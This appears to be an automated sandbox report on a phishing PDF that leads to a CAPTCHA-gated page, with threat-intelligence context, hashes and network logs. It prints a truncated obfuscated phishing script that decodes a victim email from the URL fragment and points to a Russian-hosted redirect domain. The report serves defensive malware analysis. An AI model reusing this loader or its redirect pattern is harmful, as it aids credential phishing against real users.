URL: https://plasticoscorrea.com.br/script/disk/longbow... Model: Joe Sandbox AI	{ "risk_score": 4, "reasoning": "The script appears to be a slider-based CAPTCHA implementation, which is a common security feature. However, it has some moderate-risk indicators, such as the use of external data transmission to a remote URL for verification. Additionally, the script uses legacy practices like `XDomainRequest`, which poses minor risks. Overall, the script requires further review due to the unclear purpose of the remote URL and the use of outdated APIs." }
(function () { 'use strict'; var extend = function () { var length = arguments.length; var target = arguments[0] \|\| {}; if (typeof target != "object" && typeof target != "function") { target = {}; } if (length == 1) { target = this; i--; } for (var i = 1; i < length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; } var isFunction = function isFunction(obj) { return typeof obj === "function" && typeof obj.nodeType !== "number"; }; var SliderCaptcha = function (element, options) { this.$element = element; this.options = extend({}, SliderCaptcha.DEFAULTS, options); this.$element.style.position = 'relative'; this.$element.style.width = this.options.width + 'px'; this.$element.style.margin = '0 auto'; this.init(); }; SliderCaptcha.VERSION = '1.0'; SliderCaptcha.Author = 'argo@163.com'; SliderCaptcha.DEFAULTS = { width: 280, // canvas height: 155, // canvas PI: Math.PI, sliderL: 42, // sliderR: 9, // offset: 5, // loadingText: 'Loading...', failedText: 'Try Again', barText: 'Slide To Verify', repeatIcon: 'fa fa-repeat', maxLoadCount: 3, localImages: function () { return 'images/Pic' + Math.round(Math.random() * 4) + '.jpg'; }, verify: function (arr, url) { var ret = false; $.ajax({ url: url, data: { "datas": JSON.stringify(arr), }, dataType: "json", type: "post", async: false, success: function (result) { ret = JSON.stringify(result); console.log("Result: " + ret) } }); return ret; }, remoteUrl: null }; function Plugin(option) { var $this = document.getElementById(option.id); var options = typeof option === 'object' && option; return new SliderCaptcha($this, options); } window.sliderCaptcha = Plugin; window.sliderCaptcha.Constructor = SliderCaptcha; var _proto = SliderCaptcha.prototype; _proto.init = function () { this.initDOM(); this.initImg(); this.bindEvents(); }; _proto.initDOM = function () { var createElement = function (tagName, className) { var elment = document.createElement(tagName); elment.className = className; return elment; }; var createCanvas = function (width, height) { var canvas = document.createElement('canvas'); canvas.width = width; canvas.height = height; return canvas; }; var canvas = createCanvas(this.options.width - 2, this.options.height); var block = canvas.cloneNode(true); var sliderContainer = createElement('div', 'sliderContainer'); var refreshIcon = createElement('i', 'refreshIcon ' + this.options.repeatIcon); var sliderMask = createElement('div', 'sliderMask'); var sliderbg = createElement('div', 'sliderbg'); var slider = createElement('div', 'slider'); var sliderIcon = createElement('i', 'fa fa-arrow-right sliderIcon'); var text = createElement('span', 'sliderText'); block.className = 'block'; text.innerHTML = this.options.barText; var el = this.$element; el.appendChild(canvas); el.appendChild(refreshIcon); el.appendChild(block); slider.appendChild(sliderIcon);
URL: https://plasticoscorrea.com.br/script/#Y2xpZW50cmV... Model: Joe Sandbox AI	{ "risk_score": 8, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The script uses the `eval` function to execute remote code, sends user data to an external server, and utilizes heavily obfuscated strings. Additionally, the script appears to be interacting with suspicious domains, further increasing the risk. While the script may have some legitimate functionality, the overall behavior is highly suspicious and poses a significant security risk." }
(function(_0x4a596b,_0x31a4ff){const _0x590499=_0xaaf2,_0x2b2108=_0x4a596b();while(!![]){try{const _0x18c7b8=-parseInt(_0x590499(0xc2))/0x1(parseInt(_0x590499(0xaf))/0x2)+-parseInt(_0x590499(0xb4))/0x3(parseInt(_0x590499(0xa7))/0x4)+parseInt(_0x590499(0xa1))/0x5+parseInt(_0x590499(0xab))/0x6+parseInt(_0x590499(0xb2))/0x7(parseInt(_0x590499(0xc1))/0x8)+parseInt(_0x590499(0xb3))/0x9+parseInt(_0x590499(0xb8))/0xa;if(_0x18c7b8===_0x31a4ff)break;else _0x2b2108['push'](_0x2b2108['shift']());}catch(_0x30c168){_0x2b2108['push'](_0x2b2108['shift']());}}}(_0x1b64,0x55ab5));const _0x218315=_0xf70e;function _0x2fdc(){const _0x50ba66=_0xaaf2,_0x5ddcc7=[_0x50ba66(0xaa),_0x50ba66(0xa6),_0x50ba66(0xb6),'href',_0x50ba66(0xb9),_0x50ba66(0xad),_0x50ba66(0xb0),_0x50ba66(0xa5),_0x50ba66(0xa3),_0x50ba66(0xbc),'then',_0x50ba66(0xc0),_0x50ba66(0xae),_0x50ba66(0xac),_0x50ba66(0xbe),_0x50ba66(0xb5),_0x50ba66(0xb7),'3227070RwXrGK',_0x50ba66(0xa2),'push','689483RTlxPz','https://nokixa.qemitorn.ru/yz8E/#D','stringify','143050nrtIMW',_0x50ba66(0xbf),_0x50ba66(0xa9),'13168440AqAUcH',_0x50ba66(0x9f),_0x50ba66(0xa8),_0x50ba66(0xc4),_0x50ba66(0xba),_0x50ba66(0xa0)];return _0x2fdc=function(){return _0x5ddcc7;},_0x2fdc();}function _0xaaf2(_0x1ae758,_0x2df130){const _0x1b6493=_0x1b64();return _0xaaf2=function(_0xaaf2fa,_0x35bfe2){_0xaaf2fa=_0xaaf2fa-0x9f;let _0x212642=_0x1b6493[_0xaaf2fa];return _0x212642;},_0xaaf2(_0x1ae758,_0x2df130);}(function(_0xbd2344,_0x17b3cd){const _0x4fd878=_0xaaf2,_0x7c964f=_0xf70e,_0xb9f3ea=_0xbd2344();while(!![]){try{const _0x4b38ea=parseInt(_0x7c964f(0x16d))/0x1+parseInt(_0x7c964f(0x175))/0x2+parseInt(_0x7c964f(0x181))/0x3(-parseInt(_0x7c964f(0x177))/0x4)+-parseInt(_0x7c964f(0x170))/0x5+-parseInt(_0x7c964f(0x168))/0x6+parseInt(_0x7c964f(0x16a))/0x7+parseInt(_0x7c964f(0x166))/0x8;if(_0x4b38ea===_0x17b3cd)break;else _0xb9f3ea[_0x4fd878(0xbd)](_0xb9f3ea[_0x4fd878(0xb9)]());}catch(_0x1629fa){_0xb9f3ea[_0x4fd878(0xbd)](_0xb9f3ea[_0x4fd878(0xb9)]());}}}(_0x2fdc,0x60bc6),function(_0x1ac5db,_0x295f63){const _0x58530a=_0xaaf2,_0x58e6e4=_0xf70e,_0x3b7f92=_0x36be,_0x2094cc=_0x1ac5db();while(!![]){try{const _0x4d0c3d=-parseInt(_0x3b7f92(0x1da))/0x1(parseInt(_0x3b7f92(0x1d8))/0x2)+-parseInt(_0x3b7f92(0x1dd))/0x3+-parseInt(_0x3b7f92(0x1e5))/0x4+-parseInt(_0x3b7f92(0x1df))/0x5(-parseInt(_0x3b7f92(0x1db))/0x6)+-parseInt(_0x3b7f92(0x1e3))/0x7+-parseInt(_0x3b7f92(0x1d6))/0x8*(parseInt(_0x3b7f92(0x1d9))/0x9)+parseInt(_0x3b7f92(0x1e6))/0xa;if(_0x4d0c3d===_0x295f63)break;else _0x2094cc[_0x58e6e4(0x16c)](_0x2094cc[_0x58e6e4(0x17d)]());}catch(_0x2a96d8){_0x2094cc[_0x58530a(0xbd)](_0x2094cc[_0x58e6e4(0x17d)]());}}}(_0x44b4,0x4363d));function _0x36be(_0x4c2236,_0xe8f2a6){const _0x10e8d3=_0x44b4();return _0x36be=function(_0x234bf3,_0x349076){_0x234bf3=_0x234bf3-0x1d4;let _0x4a414a=_0x10e8d3[_0x234bf3];return _0x4a414a;},_0x36be(_0x4c2236,_0xe8f2a6);}function _0x44b4(){const _0xa07b21=_0xaaf2,_0x51ecaf=_0xf70e,_0x400a81=[_0xa07b21(0xa4),_0x51ecaf(0x17a),_0xa07b21(0xbb),_0x51ecaf(0x169),_0x51ecaf(0x182),_0x51ecaf(0x174),_0x51ecaf(0x172),_0x51ecaf(0x183),_0x51ecaf(0x184),_0x51ecaf(0x167),_0x51ecaf(0x17b),_0x51ecaf(0x16b),_0xa07b21(0xc3),_0x51ecaf(0x178),_0x51ecaf(0x179),_0x51ecaf(0x173),_0x51ecaf(0x16e),_0x51ecaf(0x17c),_0x51ecaf(0x17e),_0x51ecaf(0x16f),_0xa07b21(0xb1),_0x51ecaf(0x176),'2839512iSptJM'];return _0x44b4=function(){return _0x400a81;},_0x44b4();}function _0xf70e(_0x4eb3e0,_0x5f537d){const _0x1bdd6c=_0x2fdc();return _0xf70e=function(_0x566309,_0x37cbd1){_0x566309=_0x566309-0x166;let _0x154828=_0x1bdd6c[_0x566309];return _0x154828;},_0xf70e(_0x4eb3e0,_0x5f537d);}const captcha=sliderCaptcha({'id':_0x218315(0x185),'repeatIcon':_0x218315(0x171),'onSuccess':function(){const _0x4cebbc=_0x218315,_0x3ebc4c=_0x36be,_0x2be480=window[_0x3ebc4c(0x1dc)][_0x3ebc4c(0x1d5)];let _0x53d848=_0x2be480[_0x4cebbc(0x180)](0x1);function _0x153e2c(_0x1604e4){const _0x245546=_0x3ebc4c;try{if(_0x1604e4[_0x245546(0x1e4)]%0x4!==0x0)return![];return btoa(atob(_0x1604e4))===_0
URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Please complete your review by 08/01.", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": true, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: PDF document Model: Joe Sandbox AI	{ "brands": [ "Appraisal-nation" ] }
	{ "brands": [ "Appraisal-nation" ] }
URL: https://plasticoscorrea.com.br Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://plasticoscorrea.com.br
URL: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Complete the security check to confirm you are not a bot. This helps protect our organization from threats and spam.", "prominent_button_name": "", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": true, "contains_fake_security_alerts": false }

URL: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t Model: Joe Sandbox AI	{ "contains_trigger_text": false, "trigger_text": "unknown", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": true, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: https://plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.26.5.30	cabbage.exe	Get hash	malicious	Atlantida Stealer	Browse
	https://4293857.debournigerialtd.com/#YWxleGFuZGVyLmhhZ2VuQG1hbi1lcy5jb20=	Get hash	malicious	Unknown	Browse
	https://xhdtsb3f.proventtus.com/#eWF2dXouemFtYW5AZGlnaXR1cmsuY29tLnRy	Get hash	malicious	Unknown	Browse
	http://r.email.rdv360.com/tr/cl/tl7Wu25UHrnjkn5sfc0vx0u4dtyo0w00PXMuL2iagRDUR4r6sEL0l9C97pb-2sRztT-v8bXx-XwXmfdSPRXPxbz7LHu0VNziyeYAzkCiIjcvnS7WBSJwBh3b5lynhLuGZ-icKIPKLG1_Nge8zb9RKR3x8-eqdE9Z6NZ1eNGz7xHfVQji-8Y3Ly2KhJRTjnC_XVffoO3v2wTAX7vCTKg95DV-fGkRhyk0Etop2L_GVfVQwjhA4X5PZ4rHEGj4_1HhHvnPUbiBjyJo5lqUbQI	Get hash	malicious	HTMLPhisher	Browse
	http://khelowars.com/	Get hash	malicious	Unknown	Browse
	https://794609.documents.savethenote2.com/healthesystems/viewAgreement?tsid=ZGFyeWxAaGVhbHRoZXN5c3RlbXMuY29t#%25EMAILX	Get hash	malicious	Unknown	Browse
	EFT-Payment1220_ fdp.HTm	Get hash	malicious	HTMLPhisher	Browse
	_#U266c_Play Mp3MSG(#U00f0#U0178#U201c#U017e)242 ___3pm .htm	Get hash	malicious	HTMLPhisher	Browse
	VoiceMail536536536 ___mp3 .Htm	Get hash	malicious	HTMLPhisher	Browse
	_#U266c_Play Mp3MSG(#U00f0#U0178#U201c#U017e)899 ___3pm .htm	Get hash	malicious	HTMLPhisher	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	ReIayMSG__polarisrx.com_#6577807268.htm	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	104.21.32.1
	sora.arm7.elf	Get hash	malicious	Unknown	Browse	8.44.60.40
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	104.21.13.141
	https://enterprisefocus.benchurl.com/c/l?u=11FC0F0E&e=193CF6A&c=173A1E&&t=0&l=11D51F9C4&email=s8sR2EUS6pcTEMAyWZX%2BTfGL0c%2FIo%2Bud&seq=2	Get hash	malicious	Unknown	Browse	104.17.25.14
	Tepe - 20000000826476479.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.16.1
	Order_List.scr.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.64.1
	Nuevo pedido.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	172.64.155.59
OIS1US	Employee_Letter.PDFuJPefyDW1j.url	Get hash	malicious	Unknown	Browse	162.241.2.141
	http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=	Get hash	malicious	Unknown	Browse	162.241.3.4
	http://kiesermedicalcorporation.com/mklakdjhfhm/yftguihjo/anRvcnRvcmljaUBiaWdnZS5jb20=	Get hash	malicious	Unknown	Browse	162.241.3.4
	http://prntbl.concejomunicipaldechinu.gov.co	Get hash	malicious	Unknown	Browse	162.241.85.146
	https://inboxsender.gxsearch.club/redir6/serial.php	Get hash	malicious	Unknown	Browse	162.241.2.244
	MN1qo2qaJmEvXDP.exe	Get hash	malicious	FormBook	Browse	192.185.147.100
	https://jet.cloudhostingworks.com/CetQr/	Get hash	malicious	HTMLPhisher	Browse	162.241.71.126
	wva4mZuUb4.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
	Xc501VOacR.exe	Get hash	malicious	AgentTesla, DarkTortilla	Browse	162.241.203.30
HETZNER-ASDE	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	sora.arm7.elf	Get hash	malicious	Unknown	Browse	159.69.147.8
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	DyM4yXX.exe	Get hash	malicious	Vidar	Browse	94.130.191.182
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	188.40.120.141
	digitalisierungskonzept_muster.js	Get hash	malicious	Unknown	Browse	188.40.120.141
	https://t.co/qNQo33w8wD	Get hash	malicious	HTMLPhisher	Browse	148.251.20.70
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	136.243.64.147
	https://qr.me-qr.com/PVhBu5SR	Get hash	malicious	Unknown	Browse	78.46.57.143

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
091f51a7a1c3a4504a224cc081ce9cee	http://tekascend.com	Get hash	malicious	Unknown	Browse	13.107.246.45
	EXTERNALRe.msg	Get hash	malicious	Unknown	Browse	13.107.246.45
	Sample_Order_000000991.xls	Get hash	malicious	Unknown	Browse	13.107.246.45
	Payment_swift_copy.xls	Get hash	malicious	Unknown	Browse	13.107.246.45

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	292
Entropy (8bit):	5.228420546924081
Encrypted:	false
SSDEEP:	6:iOrsXziG3+q2PgSi2nKuAl9OmbnIFUtJsFZmwPspVkwOgSi2nKuAl9OmbjLJ:74DiG3+voSZHAahFUtWF/0pV5TSZHAae
MD5:	EB33A16DBD370850B0050B82C0746453
SHA1:	26EF0BB0CD2F88F39E94BC857CD957F46925FD29
SHA-256:	CFC99C1F3C3D1CEAD3B746422D21AEB469FC9753E63004D0AD7098C91B52A90D
SHA-512:	CE6F96064717B626F809FEE4841832F44E98BF997A49FE971B39A49994A57503755E22D747595D3A34775D0BB03FE390963E0CA37E1B82DC8A07C3193DC42D56
Malicious:	false
Preview:	2025/01/09-11:23:31.887 174c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2025/01/09-11:23:31.890 174c Recovering log #3.2025/01/09-11:23:31.890 174c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	downloaded
Size (bytes):	297
Entropy (8bit):	5.075682684554496
Encrypted:	false
SSDEEP:	6:MWFBfDLolKQEHGywKd6hs9KJbQvFLMCd6j4KWTLdxVDLzT2iGMKT:tfX/QEnwKd6q9tt4Cdu4JdxF6bT
MD5:	B09E803F0798368413818C67390AE6FE
SHA1:	394A019824AFD556593EDAE755AFBDB4B75EAFA1
SHA-256:	8AEE2BE6B313B3EB54DC68DDDF89459F0960532BA5E33BEDF17D2182F586A919
SHA-512:	83C50446362D2A106F9D552FE623A84EA21A29523E86AE0E85CC926E210C0A98A6ABA17F4FDEB5ABC5212F91DA0FF235BC437D0B482E9E3DBABFB4DF045A4ACE
Malicious:	false
URL:	https://fastly.picsum.photos/id/13/280/155.jpg?hmac=cHZfJPqHBsmeAvAhZneVIh61xpa9-HeBV7Edthv_G5k
Preview:	Requested host does not match any Subject Alternative Names (SANs) on TLS certificate [ca4873145b07aaefc574b06f64911c27e8443c1568043870b6c4218680a892e7] in use with this connection.....Visit https://docs.fastly.com/en/guides/common-400-errors#error-421-misdirected-request for more information....

File type:	PDF document, version 1.7, 0 pages
Entropy (8bit):	7.902858674919756
TrID:	Adobe Portable Document Format (5005/1) 100.00%
File name:	Appraisal-nation-Review_and_Signature_Request46074.pdf
File size:	55'225 bytes
MD5:	0513c541b2989b64dfd5a1a96e064269
SHA1:	009a8b46c97704ddcfbe17aad39ebf60d2a60aa7
SHA256:	fd50c264c2fde8edb2ca0227f56cb778c5be75af7926437c43ec68790d30b303
SHA512:	50888727303266a2f31bfb0ea6ff227957c3005aded0b2d621773f87a0c00a6b8a7eca994222d2b594328efc35a6b4b8ce53e9fc3596464714e1d2dc87d2deaa
SSDEEP:	1536:eVde3NkVf6eUCtoHgz2I1sEbdLlwOqDcDB03WgiLgT:6e3Y6pCtIzOZ2jDclSWgQc
TLSH:	0343E0FA9CF34F2CD1555832ACBA233C759829A361E0638096C6EA0C4D15E796F0BCB4
File Content Preview:	%PDF-1.7.1 0 obj.<< /Type /Catalog./Outlines 2 0 R./Pages 3 0 R >>.endobj.2 0 obj.<< /Type /Outlines /Count 0 >>.endobj.3 0 obj.<< /Type /Pages./Kids [6 0 R.]./Count 1./Resources <<./ProcSet 4 0 R./Font << ./F1 8 0 R.>>./XObject << ./I1 9 0 R.>>.>>./Media

General
Header:	%PDF-1.7
Total Entropy:	7.902859
Total Bytes:	55225
Stream Entropy:	7.903581
Stream Bytes:	53874
Entropy outside Streams:	5.059160
Bytes outside Streams:	1351
Number of EOF found:	1
Bytes after EOF:

Name	Count
obj	9
endobj	9
stream	2
endstream	2
xref	1
trailer	1
startxref	1
/Page	1
/Encrypt	0
/ObjStm	0
/URI	0
/JS	0
/JavaScript	0
/AA	0
/OpenAction	0
/AcroForm	0
/JBIG2Decode	0
/RichMedia	0
/Launch	0
/EmbeddedFile	0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 9, 2025 17:23:33.706976891 CET	53	52603	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:33.974627972 CET	57642	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:23:33.974869967 CET	58619	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:23:33.982973099 CET	53	63494	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:34.022810936 CET	53	58619	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:34.023092031 CET	53	57642	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:35.261260033 CET	53	54600	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:37.330987930 CET	52255	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:23:37.331144094 CET	54230	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:23:38.014419079 CET	53	54230	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:38.014596939 CET	53	52255	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:43.874917030 CET	53	64534	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:47.143311024 CET	53	60653	1.1.1.1	192.168.2.25
Jan 9, 2025 17:23:52.317692041 CET	53	65071	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:02.339281082 CET	53	58415	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:11.271989107 CET	53	52615	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:14.719257116 CET	138	138	192.168.2.25	192.168.2.255
Jan 9, 2025 17:24:20.857522964 CET	63488	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:20.857698917 CET	57731	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:21.071341038 CET	53	57731	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:21.125107050 CET	53	63488	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:22.248414993 CET	64476	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:22.248610973 CET	54500	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:23.274801970 CET	62398	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:23.274966002 CET	52155	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:23.541172981 CET	53	62398	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:23.542130947 CET	53	52155	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:23.647017956 CET	60513	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:23.647341013 CET	63397	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:23.654275894 CET	53	60513	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:23.656979084 CET	53	63397	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:25.275516987 CET	49209	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:25.275677919 CET	50923	53	192.168.2.25	1.1.1.1
Jan 9, 2025 17:24:25.289093018 CET	53	50923	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:32.556337118 CET	53	64267	1.1.1.1	192.168.2.25
Jan 9, 2025 17:24:34.380264044 CET	53	62837	1.1.1.1	192.168.2.25
Jan 9, 2025 17:25:05.219100952 CET	53	58044	1.1.1.1	192.168.2.25

Timestamp	Bytes transferred	Direction	Data
2025-01-09 16:23:54 UTC	222	OUT	GET /rules/officeclicktorun.exe-Production-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.18129; Pro) Host: otelrules.svc.static.microsoft
2025-01-09 16:23:54 UTC	492	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 16:23:54 GMT Content-Type: text/plain Content-Length: 375299 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Mon, 06 Jan 2025 13:21:41 GMT ETag: "0x8DD2E550F264F44" x-ms-request-id: a60d83db-c01e-0034-24f9-612af6000000 x-ms-version: 2018-03-28 x-azure-ref: 20250109T162354Z-156796c549bndwlbhC1EWRbq0c00000019y000000000aubf x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2025-01-09 16:23:54 UTC	15892	IN	Data Raw: 31 32 30 31 30 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 31 30 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 32 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 52 65 73 75 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 49 20 54 3d 22 33 22 20 49 3d 22 33 30 73 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 Data Ascii: 120100v3+<?xml version="1.0" encoding="utf-8"?><R Id="120100" V="3" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <A T="2" E="TelemetryResume" /> <TI T="3" I="30s" /> <R T="4" R="120100" /> <TH
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 31 36 22 20 49 3d 22 31 32 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 4f 66 66 69 63 65 4d 69 6e 6f 72 56 65 72 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 4f 66 66 69 63 65 56 65 72 73 69 6f 6e 4d 69 6e 6f 72 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 33 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 41 70 70 53 74 61 74 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 41 70 70 53 74 61 74 65 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 34 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 4f 66 66 69 63 65 4d 75 69 43 6f 75 6e Data Ascii: </C> <C T="U16" I="12" O="true" N="OfficeMinorVer"> <S T="1" F="OfficeVersionMinor" M="Ignore" /> </C> <C T="U32" I="13" O="true" N="AppState"> <S T="1" F="AppState" M="Ignore" /> </C> <C T="U32" I="14" O="true" N="OfficeMuiCoun
2025-01-09 16:23:54 UTC	16384	IN	Data Raw: 54 3d 22 32 22 20 46 3d 22 4d 61 74 63 68 65 64 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 32 30 36 33 38 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d Data Ascii: T="2" F="Matched" M="Ignore" /> </C> <C T="W" I="1" O="false"> <S T="1" F="1" M="Ignore" /> </C> <T> <S T="1" /> </T></R><$!#>120638v0+<?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns="">
